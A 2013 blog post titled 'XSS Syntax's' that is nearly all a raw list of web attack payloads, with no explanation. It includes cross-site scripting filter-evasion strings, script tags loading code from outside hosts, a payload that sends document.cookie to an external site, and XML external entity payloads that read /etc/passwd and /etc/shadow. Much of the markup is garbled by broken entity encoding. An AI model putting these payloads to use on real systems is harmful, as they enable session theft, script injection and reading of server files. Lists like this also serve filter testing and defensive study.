<;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>;

<;XSS STYLE=";xss:expression(alert(';XSS';))";>;

<;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;

<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>;

<;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>;

<;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>;

<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>;

<;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>;

<;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>;

<;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>;

<;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>;

<;HTML xmlns:xss>;

<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>;

<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>;

<;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>;

<;HTML>;<;BODY>;

<;!--[if gte IE 4]>;

<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>;

<;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>;

<;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>;

<;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->;

<;? echo(';<;SCR)';;

<;BR SIZE=";&;{alert(';XSS';)}";>;

<;

&;#060

&;#0060

&;#00060

&;#000060

&;#0000060

&;#60;

&;#060;

&;#0060;

&;#00060;

&;#000060;

&;#0000060;

&;#x3c

&;#x03c

&;#x003c

&;#x0003c

&;#x00003c

&;#x000003c

&;#x3c;

&;#x03c;

&;#x003c;

&;#x0003c;

&;#x00003c;

&;#x000003c;

&;#X3c

&;#X03c

&;#X003c

&;#X0003c

&;#X00003c

&;#X000003c

&;#X3c;

&;#X03c;

&;#X003c;

&;#X0003c;

&;#X00003c;

&;#X000003c;

&;#x3C

&;#x03C

&;#x003C

&;#x0003C

&;#x00003C

&;#x000003C

&;#x3C;

&;#x03C;

&;#x003C;

&;#x0003C;

&;#x00003C;

&;#x000003C;

&;#X3C

&;#X03C

&;#X003C

&;#X0003C

&;#X00003C

&;#X000003C

&;#X3C;

&;#X03C;

&;#X003C;

&;#X0003C;

&;#X00003C;

&;#X000003C;

\x3c

\x3C

\u003c

\u003C

<;IMG SRC=JaVaScRiPt:alert(';XSS';)>;

<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;

<;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>;

<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;

<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;

<;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;

<;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>;

<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;

<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-

\";;alert(';XSS';);//

<;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>;

<;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>;

<;IMG SRC=";jav	ascript:alert(';XSS';);";>;

<;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>;

<;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>;

<;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>;

<;IMGSRC=";javascript:alert';XSS';)";>;

perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out

perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out

<;IMG SRC="; &;#14; javascript:alert(';XSS';);";>;

<;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;

<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;

<;SCRIPT SRC=http://ha.ckers.org/xss.js

<;SCRIPT SRC=//ha.ckers.org/.j>;

<;IMG SRC=";javascript:alert(';XSS';)";

<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;

<;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>;

<;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>;

<;SCRIPT>;a=/XSS/

<;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;

<;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;

<;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;

<;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;

<;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;

<;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;

<;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;

<;A HREF=";http://66.102.7.147/";>;XSS<;/A>;

<;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>;

<;A HREF=";http://1113982867/";>;XSS<;/A>;

<;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>;

<;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>;

<;A HREF=";h
tt	p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>;

<;A HREF=";//www.google.com/";>;XSS<;/A>;

<;A HREF=";//google";>;XSS<;/A>;

<;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>;

<;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>;

<;A HREF=";http://google.com/";>;XSS<;/A>;

<;A HREF=";http://www.google.com./";>;XSS<;/A>;

<;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>;

<;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>;

<script>document.vulnerable=true;</script>

<img SRC="jav ascript:document.vulnerable=true;">

<img SRC="javascript:document.vulnerable=true;">

<img SRC="  javascript:document.vulnerable=true;">

<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>

<<SCRIPT>document.vulnerable=true;//<</SCRIPT>

<script <B>document.vulnerable=true;</script>

<img SRC="javascript:document.vulnerable=true;"

<iframe src="javascript:document.vulnerable=true; <

<script>a=/XSS/\ndocument.vulnerable=true;</script>

\";document.vulnerable=true;;//

</title><SCRIPT>document.vulnerable=true;</script>

<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">

<body BACKGROUND="javascript:document.vulnerable=true;">

<body ONLOAD=document.vulnerable=true;>

<img DYNSRC="javascript:document.vulnerable=true;">

<img LOWSRC="javascript:document.vulnerable=true;">

<bgsound SRC="javascript:document.vulnerable=true;">

<br SIZE="&{document.vulnerable=true}">

<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>

<link REL="stylesheet" HREF="javascript:document.vulnerable=true;">

<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS

<img SRC='vbscript:document.vulnerable=true;'>

¼script¾document.vulnerable=true;¼/script¾

<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">

<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">

<IFRAME SRC="javascript:document.vulnerable=true;"></iframe>

<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>

<table BACKGROUND="javascript:document.vulnerable=true;">

<table><TD BACKGROUND="javascript:document.vulnerable=true;">

<div STYLE="background-image: url(javascript:document.vulnerable=true;)">

<div STYLE="background-image: url(javascript:document.vulnerable=true;)">

<div STYLE="width: expression(document.vulnerable=true);">

<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>

<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">

<XSS STYLE="xss:expression(document.vulnerable=true)">

exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>

<style TYPE="text/javascript">document.vulnerable=true;</style>

<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a>

<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style>



<base HREF="javascript:document.vulnerable=true;//">

<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>

<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>

<XML ID="xss"><I><B><IMG SRC="javascript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>

<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>

<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>

<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">

<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-

<a href="javascript#document.vulnerable=true;">

<div onmouseover="document.vulnerable=true;">

<img src="javascript:document.vulnerable=true;">

<img dynsrc="javascript:document.vulnerable=true;">

<input type="image" dynsrc="javascript:document.vulnerable=true;">

<bgsound src="javascript:document.vulnerable=true;">

&<script>document.vulnerable=true;</script>

&{document.vulnerable=true;};

<img src=&{document.vulnerable=true;};>

<link rel="stylesheet" href="javascript:document.vulnerable=true;">

<iframe src="vbscript:document.vulnerable=true;">

<img src="mocha:document.vulnerable=true;">

<img src="livescript:document.vulnerable=true;">

<a href="about:<script>document.vulnerable=true;</script>">

<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">

<body onload="document.vulnerable=true;">

<div style="background-image: url(javascript:document.vulnerable=true;);">

<div style="behaviour: url([link to code]);">

<div style="binding: url([link to code]);">

<div style="width: expression(document.vulnerable=true;);">

<style type="text/javascript">document.vulnerable=true;</style>

<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">

<style></script>

<<script>document.vulnerable=true;</script>

<![</script>

<script>document.vulnerable=true;</script>

<img src="blah"onmouseover="document.vulnerable=true;">

<img src="blah>" onmouseover="document.vulnerable=true;">

<xml src="javascript:document.vulnerable=true;">

<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>

<div datafld="b" dataformatas="html" datasrc="#X"></div>

[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>

<style>@import'http://www.securitycompass.com/xss.css';</style>

<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">

<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>

<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>

<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>

<script SRC="http://www.securitycompass.com/xss.jpg"></script>



<script a=">" SRC="http://www.securitycompass.com/xss.js"></script>

<script =">" SRC="http://www.securitycompass.com/xss.js"></script>

<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>

<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>

<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>

<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>

<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>

<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]

";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;

<;/script>;<;script>;alert(1)<;/script>;

<;/br style=a:expression(alert())>;

<;scrscriptipt>;alert(1)<;/scrscriptipt>;

<;br size=\";&;{alert('XSS')}\";>;

perl -e 'print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;' >; out

perl -e 'print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;' >; out

<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>

<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

<~/XSS STYLE=xss:expression(alert('XSS'))>

"><script>alert('XSS')</script>

</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

XSS STYLE=xss:e/**/xpression(alert('XSS'))>

</XSS STYLE=xss:expression(alert('XSS'))>

>"><script>alert("XSS")</script>&

"><STYLE>@import"javascript:alert('XSS')";</STYLE>

>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>

>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>

'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'

">

>"

'';!--"<XSS>=&{()}

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert("XSS<WBR>")>

<IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('X&#83<WBR>;S'&#41>

<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>

<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="jav
ascript:alert(<WBR>'XSS');">

<IMG SRC="javascript:alert(<WBR>'XSS');">

<![CDATA[<script>var n=0;while(true){n++;}</script>]]>

<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>

<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof>

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>

<script>alert('XSS')</script>

%3cscript%3ealert('XSS')%3c/script%3e

%22%3e%3cscript%3ealert('XSS')%3c/script%3e

Ethical Security Hacker Brazil

http://skamason.com/7b9R

sábado, 23 de fevereiro de 2013

XSS Syntax's

Nenhum comentário:

Postar um comentário